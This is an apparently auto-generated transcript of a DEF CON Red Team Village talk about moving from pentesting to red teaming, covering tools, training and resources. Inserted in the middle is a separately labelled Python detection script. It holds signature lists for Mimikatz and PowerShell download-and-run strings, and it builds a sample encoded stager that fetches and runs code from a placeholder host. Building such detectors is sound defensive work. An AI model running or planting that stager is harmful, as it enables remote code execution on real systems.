Red Team Village - Inside the Mind of a Threat Actor

Formal Metadata

Title: Red Team Village - Inside the Mind of a Threat Actor
Subtitle: Beyond Pentesting
Number of Parts: 374
License: CC Attribution 3.0 Unported. You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.

Content Metadata

Abstract
Red team is a commonly misunderstood offensive security discipline. "Red team" has been used as a general term for all areas of offensive security, just as "blue team" has for defensive security. True red teaming goes beyond pentesting and into adversary emulation. While there are overlapping skills, there are differences, which will be discussed as Phillip shares his experience of going from a pentester to a red teamer. In this talk, you will learn about the different areas that make up red team operations, common tools, the path to becoming a red teamer, and resources helpful for a path into red teaming.
Transcript: English (auto-generated)
work with you. Good to support the village. I'm really, really glad to see that DEF CON continued on this year. I think it was a great idea. There's a lot of people that don't always get to make it out to DEF CON, and so people get a little taste of what it's like. They miss the human interaction part, but I would bet it's going to be back even bigger and stronger next year. But thanks to Omar and Joseph for continuing this on, as well as DEF CON in general.

So, I'm happy to present my new talk here today. I have a talk that I do, The Pentester Blueprint, and it's basically a talk on becoming a pentester. And so I came up with something more red team related, because there's a lot of confusion between what true red team is and pentesting.

So, who am I? I'm Phillip Wylie. I have my CISSP, OSCP and the SANS GWAPT cert. I'm a professor at Dallas College, formerly Richland College. I'm the founder of The Pwn School Project, which is a monthly, now virtual, meetup that teaches cybersecurity techniques, with a big focus on offensive security. So a lot of our talks are geared towards that, even some good talks on SOC and other areas of security. I've been in technology and infosec for over 22 years. 2004 is when I got my start in security. The last eight years I've spent pentesting; the first five years I was a consultant. I was featured in the book Tribe of Hackers, Red Team edition. Those are some really great books by Marcus Carey and Jennifer Jin. Really good for those getting started out, but I recommend it for anyone else. It's advice from industry professionals on different topics. There's the Red Team one, there's the first Tribe of Hackers, which is across all spectrums of security, and then there's the Leadership book out. I'm also the co-author of The Pentester Blueprint: Starting a Career in Ethical Hacking. I took my talk, The Pentester Blueprint, and decided to make a book, and I teamed up with Kim Crawley to help me make that a reality. So that should be coming out late fall or so. And I'm also a co-host of The Uncommon Journey podcast with Chloé Messdaghi and Alyssa Miller.

So, the agenda. During this talk, I'm going to describe my path into offensive security, because a lot of people that attend these talks are trying to get into it. You have to look out there to find good information on how to get into certain areas of security, and there's not a lot of stuff on offensive security. So, continuing on in the spirit of The Pentester Blueprint talk, I've kind of extended that on to offensive security in general, with this talk being more focused on red teaming. We're going to discuss what offensive security is, the different domains, a red team intro, red team tools, a red team blueprint, as well as some other educational resources, books and blogs out there.

So, my offensive security path is kind of an unusual one. I started out as a pro wrestler. I graduated high school and my friends asked me,
what are you going to do for a career? And I did not have a clue. I mean, really, college wasn't in the plans for me and I didn't know what I was going to do. I was a powerlifter and my friends said, hey, you're a big guy, you should be a pro wrestler. So I went to wrestling school and I wrestled for a few years, and I got out in the late 80s due to needing a more stable career since I got married. So I was married and needed a stable career for my wife and future family. When I did that, working through other areas of manual labor and retail sales, I saw an ad on TV for a trade school that taught AutoCAD. So I went to school to be a CAD draftsman, and that's where things really started to take off. I learned about sysadmin work because I was working in offices, and we had a network administrator or system administrator come in one time to work on our systems, and I found out that this guy was making more money than I was and what he did looked a lot more interesting. I taught myself how to build computers and took a Novell networking class; that used to be the popular network operating system before Microsoft really took off with their directory services. So from there I moved into InfoSec and then AppSec, and AppSec is really where I found out about pentesting and offensive security. Learning how to use web application vulnerability scanners and going to some different vendor talks on their tools got me interested in pentesting. So in 2012, I got laid off from my job of 14 years at a mortgage company, and then I went to work as a consultant working in pentesting. I did that for five years and then got out of consulting and moved more into the corporate world, and then back in November I moved into red teaming.

So this is a slide I share every semester and during all these conference talks: only hack if you have permission, even better, written permission. Hacking without permission is illegal. So as long as you have permission, you're good. But you don't want to get in any trouble, because if you get any kind of criminal record, then it makes it hard to work in any area of IT, and especially something like offensive security. So I like this quote. I first learned about it from Spider-Man: with great power comes great responsibility.

So, what is offensive security? Offensive security is kind of a broad generalization of different types of ethical
hacking. It's assessing the security of a target using adversary tactics, techniques and procedures, or TTPs, commonly known as ethical hacking. Some of the different domains in offensive security: the two main categories are pentesting and red teaming. You can see the different areas that are covered in pentesting. Network, application, network including wireless, cloud, social engineering, physical security, hardware and vehicle security can all be tested through pentesting. Red teaming is more of a specialized area; you're getting into more adversarial type simulations.

But there's been a lot of confusion. A red team engagement is not a pentest. It's not the same thing. They've been used interchangeably, pentesting and red team, for years. It's a way to generalize, the same way "blue team" generalizes the defensive side. Even on the defensive side, all blue teams are not the same. There's a lot of differences, but a lot of people have confused red team and think that red teaming in general is all the same, but it's not. So there are some distinct differences.

Some of the commonalities, the similarities between the two areas: they're both forms of pentesting, or forms of offensive security. Exploitation, social engineering, phishing and physical security exploitation are used on both of these. Sometimes not everything; with your pentesting, a lot of times social engineering, phishing or physical security exploitation is not part of it. It's specifically built into the statement of work, the rules of engagement.

And there's some differences there too. With red teaming, you're emulating a threat actor, an APT, an advanced persistent threat. With pentesting, you're using some of those techniques, but you're not emulating a threat actor. In red teaming, you're trying to avoid detection. With pentesting, it's a time-boxed test. You're limited in the amount of time you have to test, so you don't have time to go low and slow to try to avoid being detected. And due to the time constraints, you're using vulnerability scanners and doing a lot of port and service scanning, which makes it more loud. So you're not really avoiding detection. Sometimes it could be part of a statement of work, but usually this gets more into your red teaming.

Red teaming is less restrictive. There's more areas you can go into; in most cases, social engineering and phishing are part of the scope. With pentesting, it's more limited. When PCI came out, PCI drove a lot of pentesting requirements. To be PCI compliant, it's a requirement to be pentested. So a lot of the focus has been on just what is needed to be compliant and not overall security, so some things get missed. And that's kind of carried on throughout pentesting. There's a certain area that they want tested. Sometimes there's not a lot of time to plan it out; budget constraints, they just want to get it done quickly. And with pentesting, vulnerability is the focus.
Whereas with red teaming, you're trying to simulate an actual attacker or cyber criminal.

And there's a lot of tool commonalities. If you look at the list of tools here, you see everything is pretty much the same. There are some variants and some things that are not on this list, but the common tools are listed here. With pentesting, you're using vulnerability scanners. In red teaming, if you're using a vulnerability scanner, you're going to cause noise; you want to be quiet. Metasploit can be used across both of those. And also, you see malware and exploits used across both, but red teaming is more heavily dependent on malware and phishing campaigns to get the footholds. Command and control is listed on both, and useful on both, but a lot more heavily relied on for red teaming.

And so here's kind of a little introduction on red teaming. Red teaming is scenario-based assessment, emulating threat actors and even simulating specific APTs. You can go through the MITRE ATT&CK framework and pick out specific APTs to mimic. The goal of a red team operation is to simulate real-world breaches. Not only is the operator testing the security of technology, they're testing the people and the process. A great quote from Wirefall, the founder of Dallas Hackers Association, is "the red team tests the blue team," and this is a good way to describe that. When you're doing a pentest, you're really not testing the people. You're testing the security controls and the technology. With red teaming, you're testing the reactions of the defenders, as well as any of the systems detecting it. During a pentest, things can be detected, and usually, unless it's built in to block it, you're not going to get blocked. They're going to let you complete the pentest.

And red team operations take a lot of time to plan and perform. So you're trying to plan a specific scenario, a certain type of APT you're trying to imitate. So you're taking the time to plan this out and to perform it, and usually you've got more time. A pentest, I'm not saying it's a thorough pentest, but a lot of times pentests may be a week, whereas a red team engagement could be four weeks or it could be months. So it depends on the scenario you're trying to imitate.

And so red team operations rely heavily on OSINT to enumerate information on target technologies and employees. This is leveraged through social engineering and phishing to gain an initial foothold in the target environment.
You can also do an assumed breach and use accounts. But this is a good way to see how easy it is to get past the people, the process and the technology by using phishing campaigns, sending malicious payloads to end users or compromising a site and putting payloads in there to gain access to the systems.

Detection avoidance is very important for a red team to be successful, because part of this is they're trying to stop you. Whereas in a pentest, they may see something going on and they're going to let you finish the pentest. During a red team engagement, usually the people you're testing don't know about the test. It's not announced. Usually management and a few key people know what's going on, so in case the defenders detect this, they can report it and it can be treated internally to look like a normal breach, to see how everyone reacts to it during the exercise. So it's important to stay undetected.

And red team TTPs. Red team operations will allow malware payloads to gain initial footholds, so being able to evade and obfuscate your code for your malware and exploits is very important. A lot of times, to get it to work in a pentesting role, you have to work on obfuscating your code because PowerShell is getting more detected, although in some environments it's not. So as a practitioner, keep trying. People will say this is not in environments anymore. It still will be. I mean, I performed pentests as recently as the end of 2018 where Windows XP was in a company, a Fortune 100 company. So that stuff's still out there, and not everyone's blocking PowerShell, but it's becoming more often blocked. So some of the skills that you'll need to work on are really the evasion and obfuscation.

Command and control, or C2, is a very important tool used to compromise systems, deliver payloads, elevate privileges, move laterally, and for persistence. Cobalt Strike is a very popular command and control, as well as SILENTTRINITY and Covenant. And actually Team Ares from Critical Start came out with Meteos,
which is a new C2 that's built on Go. So it looks really promising, a new one out there, and it was recently added to the C2 Matrix.

And red team ops planning. So as we mentioned, there's more planning that goes into this. It can be more detailed. So you can map the APTs from the MITRE ATT&CK framework and use tools like VECTR. VECTR is a pretty cool tool I learned about from Jorge Orchilles' talks. He does a lot of great talks on red teaming and purple teaming. He currently works for SCYTHE, and he's a SANS instructor; he teaches the SANS purple team, I mean, the SANS red team course. So keep an eye out for his videos. This VECTR tool is a framework that you can plan out your scenarios for your red team engagements in, so you can go through and map out the APTs, pulling from the MITRE ATT&CK framework.

And so red team ops can also be less complicated and not map to specific APTs, just using common TTPs. And as your program starts out, it may not take really advanced attacks to be able to compromise systems. It's kind of like offensive security in general. You want to make sure that you've got your vulnerability scanning program, your vulnerability management, solid and in place before you include pentesting. But you really want to get that in place and working. As you get to more open-scope pentests and red team engagements where more things are in scope and can be exploited, then as you become more mature, you'll need to emulate more advanced attacks. So starting out, you may not have to be as complicated, but as you're going along, you can become more complicated and detailed in your attacks. And using tools like the MITRE ATT&CK framework and VECTR to map those out are great options.

And so there are some additional red team benefits here. A major benefit of red team is testing the people, process and technology. So if, during the operation, activities are not detected, then the red team can work with the security team to tune the security defenses to be able to detect malicious activity. This can be extended to purple teaming engagements or activities, where you just work with the blue team to tune their systems to detect different types of exploits. So during your testing, if PowerShell is not being detected, if Mimikatz is not being detected, then you can do a purple team activity, just working with your blue team as you watch specific attacks, see if they detect it, and help them work on detecting those, where you can build signatures to detect those vulnerabilities.

And so in the spirit of The Pentester Blueprint, I'm going to go into some details here on how to become a red team operator. So basically, a red team operator is a pentester. You're getting more specialized, going more into adversarial simulation, but you need a base starting out. So your base: you need to understand technology. So if you're jumping into this from nothing, then you're going to have to build these technologies.
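The purple-team tuning described a little earlier (PowerShell and Mimikatz going undetected, then building signatures with the blue team), as an added example that is not code from this talk: a small Python triage over constructed Windows-style events (Security 4688 process command lines and PowerShell 4104 script blocks) that decodes -EncodedCommand before matching and keeps name-based and behaviour-based signatures in separate tiers, so a renamed tool still trips the behaviour tier. The hosts, URLs and event text are constructed samples, not real telemetry.

```python
"""Purple-team detection tuning over constructed PowerShell telemetry.

Added example, not code from the talk. Event shapes mimic Windows Security
4688 (process creation command line) and PowerShell 4104 (script block)
records; the sample events, hosts and URLs below are constructed, not real.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Event:
    event_id: int   # 4688 = process creation, 4104 = script block logging
    host: str
    text: str       # command line for 4688, script block text for 4104


# Two tiers of signatures. A tool or author name is trivial to rename (the
# talk notes detections often fire on nothing more than that), so it only
# earns "medium". A behaviour string (a Mimikatz module, download-and-run,
# hidden encoded launch) survives renaming and earns "high".
NAME_SIGNATURES = ["mimikatz", "gentilkiwi"]
BEHAVIOUR_SIGNATURES = [
    "sekurlsa::", "lsadump::", "privilege::debug",
    "downloadstring(", "frombase64string(", "iex (", "-nop -w hidden",
]
# -EncodedCommand may be abbreviated (-e, -ec, -enc); its argument is
# base64 over UTF-16LE, so it must be decoded before any string match.
ENCODED_RE = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell_command(script: str) -> str:
    """Build an -EncodedCommand argument; used only to construct samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries one, else None."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: Event) -> Dict:
    """Score one event; the decoded payload is searched alongside the raw text."""
    decoded = decode_encoded_command(event.text) if event.event_id == 4688 else None
    haystack = (event.text + "\n" + (decoded or "")).lower()
    name_hits = [s for s in NAME_SIGNATURES if s in haystack]
    behaviour_hits = [s for s in BEHAVIOUR_SIGNATURES if s in haystack]
    if behaviour_hits:
        severity = "high"
    elif name_hits or decoded is not None:
        severity = "medium"
    else:
        severity = "none"
    return {
        "host": event.host, "event_id": event.event_id, "severity": severity,
        "name": name_hits, "behaviour": behaviour_hits, "decoded": decoded,
    }


def triage(events: List[Event]) -> List[Dict]:
    """Everything that is not clean, highest severity first."""
    order = {"high": 0, "medium": 1}
    flagged = [c for c in map(classify, events) if c["severity"] != "none"]
    return sorted(flagged, key=lambda c: order[c["severity"]])


# Constructed samples. placeholder.invalid is a reserved, non-routable name.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a')"
SAMPLE_EVENTS = [
    Event(4688, "WS01", "powershell.exe -NoP -W Hidden -EncodedCommand "
          + encode_powershell_command(STAGER)),
    # Renamed wrapper: a name-only signature misses it, the module string does not.
    Event(4104, "WS02", "function Invoke-Kittens { ... 'sekurlsa::logonpasswords' ... }"),
    Event(4104, "WS03", "Get-Service | Where-Object Status -eq 'Running'"),
    Event(4688, "WS04", "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], hit["event_id"], hit["severity"], hit["name"], hit["behaviour"])
```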
You have to understand networking, operating systems and Active Directory, because those are what you're performing pentests and red team engagements against on these networks. Active Directory is Microsoft's directory service, where all the users and the different computer objects and security settings are set. If you get access to that, you can breach a lot of things, compromising at a large scale. I mean, the way to look at it is kind of like a single sign-on type of solution using LDAP. So if you're able to compromise Active Directory, then you can get access to anything in the environment. So you have to understand this technology.

So, understanding networking, understanding operating systems from a system administrator perspective. You need to be able to start and stop services, disable firewalls, enable services, and that sort of thing during a pentest. So if you gain a shell on a system, or command line access, then the more you understand the command line, the more things you can do, the more effective you can be. And you've got to understand networking and pentesting, hacking. So you have to understand the different tools and techniques that penetration testers and hackers use. You have to have those because hacking is part of being a red teamer. That's part of the job. It's kind of an extension, or more advanced form, of pentesting.

And so programming and scripting can be very important. Some of the best hackers I know can program. They can write their own code or they can write their own scripts. So popular ones out there are Python and PowerShell from a red teamer or pentester perspective. Knowing how to use PowerShell, using some of the tools like PowerShell Empire and some of the different exploitation tools out there and command and control, is very important. So you don't necessarily have to know how to write PowerShell, although it's good. Tools like Python and Golang can be used across multiple platforms. Python has been very popular for years. It allows you to write tools pretty quickly and modify tools. And from a programming and scripting perspective, at first you need to really be able to modify exploit code, be able to look at Python code and be able to alter that. Maybe you find some exploit code and there's something different about that system that you need to modify. So just understanding how to modify exploits is important. It's a good starting step. But be able to write Python scripts. Golang is a very new, popular one. I guess it's been out five or six years or so, maybe longer, eight years. But it's a really good one because it's also a compiled language. It can run across multiple platforms. The thing I really like about it too is you can compile code on a Linux or Mac system to run on Windows.
So this is kind of nice because some of your exploits, you know, if you're doing a pentest, then you need, you know, a similar system with Linux to be able to compile your exploit code, a similar system or compile it on that system. With this, you can easily compile it on your own system. And then C sharp is a very popular one for pentesting since kind of
some of the PowerShell started getting detected and people moved on to C sharp. There's a lot of tools out there written in C sharp. A lot of the tools are, you know, kind of going away from PowerShell more towards C sharp. So understanding these tools, you'll write your own tools and make you a lot better hacker. So yeah, just be able to do that makes, you know, like I said,
some of the best hackers I know in red teamers know how to write their own code. I mean, you stop and look at some of the tools out there. Harmjoy, for instance, from SpecterOps. He's a prime example of someone that writes tools and he's a red teamer. So I mean, this goes to show you, you look at a lot of these high level pentesters and red
teamers, they're writing exploits and they're writing tools. So if you really want to do well, then that's an area to focus on. So red team focused skills. So malware and exploit development, where these are also important to pentesting, really working on obfuscating and
being able to evade systems with your PowerShell code or C# or any language you're writing, and being able to obfuscate. Sometimes there are tools written for that, and you can use different tools to obfuscate, or you're going to manually modify it yourself to try to take some of the headers and signatures out, so it's not as easily detectable. Sometimes it
could just be the name of the developer of the tool that the system is picking up, or the name of the tool in the system. So it's just being able to modify your code where it's not being detected. Active Directory exploitation: understanding Active Directory is not enough, but understanding Active Directory and knowing how to exploit it is very important in
red teaming. And command and control. So command and control is a very important tool. It allows you to send payloads to your systems. Once you get a system compromised, you get access to it. Then you can do lateral movement, going to other computers, other accounts, try to escalate privileges, and it helps you maintain persistence, maintain control
over the systems that you've exploited. Then phishing and social engineering. These are two very helpful tools, because in a lot of cases maybe their systems are pretty secure as far as trying to crack passwords, or if you're doing an assumed breach or you're
on that network and maybe you're not able to crack hashes. So if you can send malware through email, through phishing campaigns, then that's a way to get an initial foothold, and social engineering to get people to execute that code. Physical security exploits: gaining
access to the buildings, getting past security into the server rooms or different areas to be able to pull off your exploits. And here is a learning path to follow for gaining these skills, a good baseline or good place to start. And this is assuming
that you've got an IT background. You've got to learn the hacking skills. So certification courses like the OSCP, and Hack The Box, are really good to build those skills, and learning social engineering. But the OSCP is a really good one, because you've got to get those hacking
skills before you really get into the red teaming. So you need to be a good hacker. There are other courses out there, like eLearnSecurity, where a lot of those other courses really focus on pen testing, and pen testing and hacking are similar. With the OSCP there is a
big focus on hacking skills. And with some of the newer content of the OSCP, they've kind of gone more in the direction of adding more pen testing content, whereas before it was mainly just a really great hacking course, kind of teaching the way pen testing
used to be. But a good path is, once you get the skill set of someone with the OSCP, then you can start working on the red teaming skills. And this is something you can work on hand in hand, because with your red teaming skills you're going to be working on Active Directory. So there are some courses out there that are really good for red teaming, and Pentester
Academy's Red Team Labs is a good resource. They have Active Directory in their labs, so they've got different levels, but they even have a red team certification. They have labs where you're using Linux to exploit Windows systems, as well as Windows systems
to perform the same similar labs, learning how to use PowerShell exploits during that to compromise systems. And then eLearnSecurity: their pentesting extreme course is labeled pen testing extreme, but it's a red team course. It teaches red teaming techniques.
They teach you exploit development, code obfuscation, and some other techniques that are important for red teaming. Hack The Box Pro Labs, RastaLabs: this is a really great one to learn. And it kind of inspired Rasta Mouse to start the Zero-Point Security
Red Team Ops course. I'm actually going through that, and they actually have a certification with that. I'm currently going through that at the moment, and it's a really good course. I mean, it's even set up to where you can send phishing emails in that environment. And so, some different tools and resources for red teaming. So for your APT planning,
as mentioned, the MITRE ATT&CK framework and VECTR. So there are the URLs for those resources. Those are really good to know. Just getting out there and learning how a threat actor's mind works, getting that threat actor mindset through tools like the MITRE ATT&CK framework, learning how those TTPs work. You get to see some
of the common attacks. And this is a great resource for defenders; it's widely used by defenders. Command and control: the C2 Matrix. You can find that at thec2matrix.com. Cobalt Strike is one of the more popular ones, one of the first command and control frameworks. Although Metasploit is also considered command and control, it's also pretty heavy on the
exploit framework side. But Cobalt Strike, SILENTTRINITY, PowerShell Empire (BC Security took over support of that and upgraded it to Python 3, and you can use Starkiller, which is a web front end to it that makes it more similar to some of the other C2s that have a web front end).
Or you can use these tools as a team. You can collaborate together, so you can collaborate on the same project. So these really work well for collaboration. And a shout out to Critical Start's TeamARES with their DeimosC2 that recently came out. It's written
in Golang. They're adding new items to each feature as it goes along. So it just recently came out. They're pretty excited about it. It looks like a really good tool, so you should check that out. And it's a free tool. It's open source, like a lot of the other C2s.
And operating systems: Slingshot OS, or Slingshot Linux, you can find that on SANS. It's a good operating system for pen testing as well as red teaming. It has a lot of the C2s already installed. I believe VECTR is installed as well. Kali Linux and
Parrot OS are good hacking options, and Commando VM for Windows. So in red teaming you're dealing a lot with Active Directory, so it's good to have a Windows box to test with. And resources and courses. So Hack The Box Pro Labs, as mentioned, RastaLabs,
one of Rasta Mouse's projects; Pentester Academy's Red Team Labs; and institute.sektor7.net. This is a good course. They're relatively inexpensive, and I'm kind of listing some of these out based on the expense of the course. They
have a course on malware writing for red teaming. They have a privilege escalation course, as well as another course I can't think of at the moment. These three different courses build red team skills. And sometimes some courses may deal more on the red team side and less on the malware. With this course, they have good coverage of malware. So that's a good skill to develop, and they cover that in that course. And Zero-Point Security,
the red team labs course by Rasta Mouse, which they actually have a certification for. This is a pretty cool environment. You have VPN access to it. They have Windows boxes in there. You're separated through a firewall, so you're connecting in, and you have to send a phishing
email to get on that system. So it's really cool. If you have the OSCP, you can just take the exam. But I didn't really want to miss out on the educational opportunity of going through the course fully. So that's currently what I'm working on. It's been a lot of fun so
far. eLearnSecurity, as we mentioned, the pentesting extreme course. That one's a red team course, and they cover malware. So it's a really good, well-rounded course. It covers a lot of good material. I haven't personally taken this course myself, but I've taken the eLearnSecurity web app pentesting course and their mobile pentesting course, and they're good quality courses. And they don't expect you to be an expert to be able to take these
courses and learn from them. They start in enough detail that someone with technical experience can pick these up. And then the SpecterOps Adversary Tactics: Red Team Operations course. Fortunately, I got to take a couple of courses before COVID really started ramping up and causing us all to have to socially isolate. But I got to
attend this talk, and HarmJ0y was one of the presenters there, as well as some of the other gurus from SpecterOps. But this course, if you've got Cobalt Strike, is a really good way to learn Cobalt Strike and use it as a red team operator. FortyNorth has
a couple of good classes: their Initial Access Operations and Intrusion Operations. So they cover some malware in their course, as well as Silent Break Security, which has a malware development course and adversary simulation. So these are really great courses,
and the SANS Red Team Exercises and Adversary Emulation course. This is a two-day course, and Jorge Orchilles teaches it, and it looks like a really good course. And then they get into the red team from a building-a-team type perspective, as well as doing the technology piece. And then Cobalt Strike offers some free videos on their site. If
you go to the Training and Support tab on the Cobalt Strike website, there are links to the YouTube page as well. So they've got all sorts of tools in Cobalt Strike that they teach you how to use. I mean, a lot of the tools are pretty easy to pick up on. But if you haven't
had experience with C2s, then I highly recommend these videos, because there are things that are done a little bit differently with a C2. But they do a good job of covering the different tools that you can use within Cobalt Strike. And Cobalt Strike uses PowerShell and C# tools pretty heavily, as well as other scripting languages and
executable files. So that's a good resource out there. You get a good idea of how red teaming works from the Cobalt Strike video series as well. And resources and blogs. So here's a list of some blogs and resources that I've come across. I started dedicated red teaming back in November,
so I've been doing a lot of research and studying to learn the red team side of things. And so here are some good ones. The Red Team Journal is kind of an older blog. I don't think it's been updated lately, but there's a lot of good information on there.
The Red Team Guide is based on the Red Team Guide book, but there are a lot of good documents on starting pen tests and some of the different techniques, I mean, red teaming techniques. And then Threat Express is kind of a site related to redteam.guide, the same people. It was kind of their blog before they came out with the Red Team Guide.
Good information there. byt3bl33d3r's website, along with his awesome tools. There's a lot of great information on his blog. HarmJ0y's blog is great. BC Security, SpecterOps, Rasta Mouse, Hausec (who is actually part of SpecterOps), Silent Break Security's blog,
FortyNorth's blog, and ired.team and Vincent Yiu's blogs. These are some really good places to learn. And I've been using a lot of resources as I'm going through Rasta Mouse's Zero-Point Security Red Team Ops course.
There are some other books out there. So this is one of the books out here that recently came out. The Hacker Playbook: if you've seen version one and two, they're more pen testing related, but version three gets into red teaming. I highly recommend, if you don't have version two,
get version two. It's got a lot of good real-world pen testing attack scenarios. Also Red Team Development and Operations. This kind of shows you how to build a red team. And one of the authors is Joe Vest. He formerly worked with SpecterOps. I got to meet him back during the red team training through SpecterOps earlier this year.
So it's a really good book. And they've got some different checklists and stuff on how to perform red team operations. So that's a really good book. Even for management, or people who manage red teams, I'd recommend this book, as it kind of shows you how red team operations work.
And then Hands-On Red Team Tactics: A Practical Guide to Mastering Red Team. This book actually covers some Cobalt Strike information. And this was recently recommended yesterday, actually Friday, during one of the talks in Red Team Village. So it's a little more of an indicator that it's a good resource. But these are some good books
out there, as well as just pen testing books in general, learning pen testing, and certifications. There are not a lot of certifications out there yet, and there may be more than this. And I saw another red team cert that is more physical and more lock picking and more
physical security related. But what you're going to need, in most cases, is what you would gain from Zero-Point Security's cert, Pentester Academy, and eLearnSecurity: the skills that you would need for performing red teaming operations. While some of the physical stuff is important, you can take lock picking courses and learn physical security
to kind of really get started, especially if you have a pen testing background. And these three cert courses, or the certs, would be good to have. And some of these pen test focused certs from Offensive Security, SANS, and eLearnSecurity. The Offensive Security and
SANS certs are really good for getting your foot in the door as a pen tester and good for getting pen testing jobs. eLearnSecurity is starting to gain more and more notoriety. They're really good courses, and really well written and really well priced. If you don't have the money to, or your company won't put you through, SANS training, then Offensive Security and eLearnSecurity, those certification courses are really good ones, as well as the
Pentester Academy courses. And here's my contact information. I kind of got into teaching and presenting at conferences as a way to share. I used to mentor, and still do mentor, a lot of people. A lot of times it's just answering questions and sharing resources. So this stuff's my hobby.
I live and breathe this stuff. So I'm always up to talk about this stuff, give career advice, and help out. If you have any questions, there's my contact information. Feel free to contact me. And so that concludes my presentation.
Awesome. Thank you so much, Phillip. As always, you have been amazing. And thank you so much for supporting the community and the Red Team Village as well. And for those of you that are online, please join the conversation in Discord. We have the link at the bottom of the screen, in the description, whether you are on YouTube, on Periscope, or on Twitch. Please join us.